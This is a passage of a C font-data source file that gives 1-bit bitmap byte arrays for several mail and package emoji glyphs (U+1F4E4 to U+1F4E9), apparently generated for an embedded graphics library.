0xff, 0xfe, 0x0, 0x0, 0x1, 0xe0, 0x1c, 0x0,
0x3f, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x78, 0xf,
0x0, 0x7, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x3e,
0x3, 0xc0, 0x0, 0x7f, 0xff, 0xff, 0x80, 0x0,
0xf, 0x0, 0xf0, 0x0, 0xf, 0xff, 0xff, 0xf0,
0x0, 0x3, 0xc0, 0x7c, 0x0, 0x0, 0xff, 0xff,
0xff, 0x0, 0x0, 0xf0, 0x1e, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xe0, 0x0, 0x3c, 0x7, 0x80, 0x0,
0x3, 0xff, 0xff, 0xfc, 0x0, 0x1f, 0x1, 0xe0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xc0, 0xff, 0x80,
0xf0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xf8, 0x7f,
0xe0, 0x3c, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff,
0x1e, 0x78, 0xf, 0x0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xe7, 0x9e, 0x7, 0xc0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xfc, 0xe3, 0x81, 0xe0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0x9c, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xf7, 0x1c, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xfe, 0xe3,
0x81, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xfc, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0x8e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xff, 0xf1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xee, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0xfd, 0xc3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xb8,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0xf3, 0x87, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xfe, 0x70, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0x8e, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xf1, 0xe1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x1c, 0x1f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0x83,
0xc1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x38, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe0, 0x3, 0x80, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x78, 0x3, 0x80, 0x61,
0x80, 0x30, 0xc0, 0x0, 0x0, 0x7, 0x80, 0x70,
0xc, 0x38, 0x6, 0x1c, 0x0, 0x0, 0x0, 0x7c,
0x1c, 0x1, 0xc3, 0x0, 0xc1, 0x80, 0x0, 0x0,
0x3, 0xff, 0x0, 0x18, 0x7f, 0xfc, 0x30, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x3, 0x7, 0xff, 0x6,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xc0, 0x0,
0x0, 0x0,
/* U+1F4E4 "📤" */
0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x0, 0x0,
0x7, 0xff, 0xe3, 0xff, 0xe3, 0xff, 0xf0, 0x0,
0x7f, 0xff, 0x1f, 0xff, 0x1f, 0xff, 0xc0, 0x3,
0x0, 0x0, 0xff, 0xf8, 0x0, 0x6, 0x0, 0x38,
0x0, 0x7, 0xff, 0xc0, 0x0, 0x38, 0x1, 0x80,
0x0, 0x3f, 0xfe, 0x0, 0x0, 0xc0, 0x1c, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x7, 0x0, 0xc0, 0x0,
0xf, 0xff, 0x80, 0x0, 0x18, 0xe, 0x0, 0x0,
0x7f, 0xfc, 0x0, 0x0, 0xe0, 0x60, 0x0, 0x3,
0xff, 0xe0, 0x0, 0x3, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x61, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0, 0xf,
0xff, 0xf8, 0x0, 0xe0, 0x0, 0x0, 0x0, 0xe0,
0x3, 0xc0, 0x3, 0x80, 0x0, 0x0, 0xe, 0x0,
0x1e, 0x0, 0xe, 0x0, 0x0, 0x0, 0xe0, 0x0,
0xf0, 0x0, 0x38, 0x0, 0x0, 0xe, 0x0, 0x7,
0x80, 0x0, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x3c,
0x0, 0x3, 0xff, 0xff, 0xfe, 0x0, 0x1, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4E5 "📥" */
0x0, 0x0, 0x0, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc7, 0xff, 0xf1, 0xff, 0xf0, 0x0,
0x7f, 0xff, 0x1f, 0xff, 0x1f, 0xff, 0xc0, 0x3,
0x0, 0x0, 0x7f, 0xf0, 0x0, 0x6, 0x0, 0x38,
0x0, 0x3, 0xff, 0x80, 0x0, 0x38, 0x1, 0x80,
0x0, 0xf, 0xf8, 0x0, 0x0, 0xc0, 0x1c, 0x0,
0x0, 0x3f, 0x80, 0x0, 0x7, 0x0, 0xc0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x18, 0xe, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0xe0, 0x60, 0x0, 0x0,
0x8, 0x0, 0x0, 0x3, 0x7, 0x0, 0x0, 0x0,
0x40, 0x0, 0x0, 0x18, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x61, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0, 0xf,
0xff, 0xf8, 0x0, 0xe0, 0x0, 0x0, 0x0, 0xe0,
0x3, 0xc0, 0x3, 0x80, 0x0, 0x0, 0xe, 0x0,
0x1e, 0x0, 0xe, 0x0, 0x0, 0x0, 0xe0, 0x0,
0xf0, 0x0, 0x38, 0x0, 0x0, 0xe, 0x0, 0x7,
0x80, 0x0, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x3c,
0x0, 0x3, 0xff, 0xff, 0xfe, 0x0, 0x1, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4E6 "📦" */
0x0, 0x0, 0x0, 0x4, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0xf, 0xfc,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x3, 0xf1, 0xf0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x7c, 0xf, 0x80,
0x7, 0xe0, 0x0, 0x0, 0x1f, 0x0, 0x3e, 0x0,
0x1f, 0x80, 0x0, 0x7, 0xc0, 0x0, 0xf8, 0x0,
0x7e, 0x0, 0x1, 0xfe, 0x0, 0x7, 0xe0, 0x1,
0xf8, 0x0, 0x7f, 0xf0, 0x0, 0x1f, 0x0, 0x7,
0xc0, 0xf, 0x87, 0xc0, 0x0, 0x7c, 0x0, 0x1f,
0x3, 0xe0, 0x1f, 0x0, 0x3, 0xf0, 0x0, 0xfc,
0xfc, 0x0, 0xf8, 0x0, 0xf, 0x80, 0x3, 0xff,
0x80, 0x3, 0xe0, 0x0, 0x3e, 0x0, 0x1f, 0xfc,
0x0, 0xf, 0x80, 0x1, 0xf8, 0x7, 0xff, 0xf0,
0x0, 0x7e, 0x0, 0x7, 0xe1, 0xff, 0xe7, 0xc0,
0x1, 0xf0, 0x0, 0x1f, 0x7e, 0x7e, 0x1f, 0x0,
0x7, 0xc0, 0x0, 0x7f, 0x87, 0xe0, 0xf8, 0x0,
0x1f, 0x0, 0x3, 0xe0, 0x7e, 0x3, 0xe0, 0x0,
0xfc, 0x0, 0x1c, 0x7, 0xe0, 0xf, 0x80, 0x3,
0xe0, 0x1, 0xc0, 0x7e, 0x0, 0x3e, 0x0, 0xf,
0x80, 0x1c, 0x7, 0xe0, 0x1, 0xf0, 0x0, 0x7e,
0x1, 0xc0, 0x7e, 0x0, 0x7, 0xc0, 0x1, 0xf0,
0x1c, 0x7, 0xe0, 0x0, 0x1f, 0x0, 0x1f, 0x1,
0xc0, 0x7e, 0x0, 0x0, 0xfc, 0x3, 0xf0, 0x1c,
0x7, 0xe0, 0x0, 0x3, 0xf0, 0xff, 0x1, 0xc0,
0x7e, 0x0, 0x0, 0xf, 0xbe, 0x70, 0x1c, 0x7,
0xe0, 0x0, 0x0, 0x3f, 0xc7, 0x1, 0xc0, 0x7e,
0x0, 0x0, 0x1, 0xf0, 0x70, 0x7c, 0x7, 0xe0,
0x0, 0x0, 0xe, 0x7, 0x7, 0xc0, 0x7e, 0x0,
0x0, 0x0, 0xe0, 0x70, 0xfc, 0x7, 0xe0, 0x0,
0x0, 0xe, 0x7, 0x7c, 0x0, 0x7e, 0x0, 0x0,
0x0, 0xe0, 0x7f, 0xc0, 0x7, 0xe0, 0x0, 0x0,
0xe, 0x7, 0xd8, 0x0, 0x7e, 0x0, 0x0, 0x0,
0xe0, 0x78, 0x0, 0x7, 0xe2, 0x0, 0x0, 0xe,
0x7, 0x0, 0x0, 0x7e, 0x60, 0x0, 0x0, 0xe0,
0x60, 0x0, 0x7, 0xe3, 0x40, 0x0, 0xe, 0x4,
0x0, 0x0, 0x7e, 0x2c, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x7, 0xe2, 0x64, 0x0, 0xe, 0x0, 0x0,
0x0, 0x7e, 0x24, 0x70, 0x0, 0xe0, 0x0, 0x0,
0x7, 0xe0, 0x47, 0xc0, 0xe, 0x0, 0x0, 0x0,
0x7e, 0x64, 0x3e, 0x0, 0xe0, 0x0, 0x0, 0x7,
0xe3, 0x83, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x7f,
0xe, 0x1c, 0x0, 0xe0, 0x0, 0x0, 0xf, 0xfc,
0x21, 0x0, 0xe, 0x0, 0x0, 0x3, 0xf3, 0xf0,
0x50, 0x0, 0xe0, 0x0, 0x0, 0xfc, 0xf, 0x87,
0x0, 0xe, 0x0, 0x0, 0x3f, 0x0, 0x3e, 0x1c,
0x0, 0xe0, 0x0, 0xf, 0xc0, 0x0, 0xf8, 0x40,
0xe, 0x0, 0x1, 0xf0, 0x0, 0x3, 0xe0, 0x0,
0xe0, 0x0, 0x7c, 0x0, 0x0, 0x1f, 0x0, 0xe,
0x0, 0x1f, 0x80, 0x0, 0x0, 0x7c, 0x0, 0xe0,
0x7, 0xe0, 0x0, 0x0, 0x1, 0xf0, 0xe, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x7, 0xc0, 0xe0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x1e, 0xe, 0xf, 0x80,
0x0, 0x0, 0x0, 0x0, 0x78, 0xe3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xee, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F4E7 "📧" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xef, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xdf, 0x9e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x7e, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf1, 0xf8, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x87, 0xe0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x1f, 0x81,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x7e,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1,
0xf8, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x70,
0x7, 0xe0, 0x7, 0x0, 0x7, 0xff, 0xe0, 0x3,
0x80, 0x1f, 0x80, 0xe, 0x0, 0x1f, 0xff, 0x80,
0x1c, 0x0, 0x7e, 0x0, 0x1e, 0x0, 0x7f, 0xfe,
0x1, 0xe0, 0x1, 0xf8, 0x0, 0x3c, 0x1, 0xc0,
0x0, 0xf, 0x0, 0x7, 0xe0, 0x0, 0x78, 0x7,
0x0, 0x0, 0x78, 0x0, 0x1f, 0x80, 0x0, 0xf0,
0x1c, 0x0, 0x3, 0xc0, 0x0, 0x7e, 0x0, 0x1,
0xe0, 0x70, 0x0, 0x1e, 0x0, 0x1, 0xf8, 0x0,
0x7, 0xc1, 0xc0, 0x0, 0xf8, 0x0, 0x7, 0xe0,
0x0, 0x3f, 0x87, 0x0, 0x7, 0xf0, 0x0, 0x1f,
0x80, 0x0, 0xee, 0x1c, 0x0, 0x1d, 0xc0, 0x0,
0x7e, 0x0, 0x7, 0x18, 0x70, 0x0, 0x63, 0x80,
0x1, 0xf8, 0x0, 0x38, 0x21, 0xff, 0xe1, 0x7,
0x0, 0x7, 0xe0, 0x0, 0xe0, 0x7, 0xff, 0x80,
0x1c, 0x0, 0x1f, 0x80, 0x7, 0x0, 0x1f, 0xfe,
0x0, 0x38, 0x0, 0x7e, 0x0, 0x3c, 0x0, 0x70,
0x0, 0x0, 0xf0, 0x1, 0xf8, 0x0, 0xe0, 0x1,
0xc0, 0x0, 0x1, 0xc0, 0x7, 0xe0, 0x7, 0x0,
0x7, 0x0, 0x0, 0x3, 0x80, 0x1f, 0x80, 0x3c,
0x0, 0x1c, 0x0, 0x0, 0xf, 0x0, 0x7e, 0x0,
0xe0, 0x0, 0x70, 0x0, 0x0, 0x1c, 0x1, 0xf8,
0x7, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x38, 0x7,
0xe0, 0x1c, 0x0, 0x7, 0x0, 0x0, 0x0, 0xe0,
0x1f, 0x80, 0xe0, 0x0, 0x1c, 0x0, 0x0, 0x1,
0xc0, 0x7e, 0x7, 0x0, 0x0, 0x7f, 0xfe, 0x0,
0x3, 0x81, 0xf8, 0x1c, 0x0, 0x1, 0xff, 0xf8,
0x0, 0xe, 0x7, 0xe0, 0xe0, 0x0, 0x7, 0xff,
0xe0, 0x0, 0x1c, 0x1f, 0x87, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x7e, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe1, 0xf8, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xe7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x9f, 0x9c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x7e,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1d,
0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc,
/* U+1F4E8 "📨" */
0xff, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x83, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x0, 0xf, 0xe0, 0x0, 0x3b, 0x80, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xc0, 0x0, 0x63, 0x80,
0x0, 0x0, 0x0, 0x0, 0xf3, 0x80, 0x0, 0xc3,
0x80, 0x0, 0x0, 0x0, 0x7, 0xc7, 0x0, 0x3,
0x83, 0x80, 0x0, 0x0, 0x0, 0x1e, 0xc, 0xff,
0x7, 0x7, 0x80, 0x0, 0x0, 0x0, 0xf8, 0x39,
0xfe, 0xc, 0x7, 0x80, 0x0, 0x0, 0x3, 0xe0,
0x70, 0x0, 0x38, 0x7, 0x80, 0x0, 0x0, 0x1f,
0x0, 0xe0, 0x0, 0x70, 0x7, 0x80, 0x0, 0x0,
0x7c, 0x1, 0x80, 0x0, 0xe0, 0x7, 0x80, 0x0,
0x3, 0xe0, 0x7, 0x0, 0x1, 0x80, 0x7, 0x80,
0x0, 0xf, 0x80, 0xe, 0x0, 0x7, 0x0, 0x7,
0x80, 0x0, 0x7c, 0x0, 0x1c, 0x0, 0xe, 0x0,
0xf, 0x80, 0x1, 0xf8, 0x0, 0x30, 0xfc, 0x18,
0x0, 0x3f, 0x80, 0x7, 0xf0, 0x0, 0xe1, 0xf8,
0x30, 0x0, 0xe7, 0x0, 0x3e, 0x70, 0x1, 0xc0,
0x0, 0xe0, 0x3, 0x87, 0x0, 0xf8, 0xe0, 0x3,
0x0, 0x1, 0xc0, 0xe, 0xf, 0x7, 0xc0, 0xe0,
0x6, 0x0, 0x3, 0x0, 0x38, 0xf, 0x1f, 0x1,
0xc0, 0x1c, 0x0, 0x6, 0x0, 0xf0, 0xf, 0xf8,
0x1, 0x80, 0x38, 0x0, 0x1c, 0x3, 0xc0, 0xf,
0xe0, 0x3, 0x80, 0x60, 0x0, 0x38, 0xf, 0x0,
0xf, 0x80, 0x7, 0x0, 0xc0, 0x0, 0x60, 0x3c,
0x0, 0xc, 0x0, 0x6, 0x3, 0x80, 0x0, 0xc0,
0xf0, 0x0, 0x0, 0x0, 0xe, 0x7, 0x0, 0x3,
0x83, 0xc0, 0x0, 0x0, 0x0, 0xc, 0xc, 0x0,
0x7, 0xf, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x18,
0x0, 0xc, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x38,
0x70, 0x0, 0x38, 0x70, 0x0, 0x0, 0x0, 0x0,
0x30, 0xe0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x71, 0x80, 0x0, 0xe7, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe3, 0x0, 0x1, 0x9c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xee, 0x0, 0x7, 0x70, 0x0,
0x0, 0x0, 0x0, 0x1, 0xdc, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xb0, 0x0, 0x1f,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0,
/* U+1F4E9 "📩" */
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xef, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf7, 0xe7, 0x80, 0x0, 0x0, 0x0, 0x1, 0xe7,
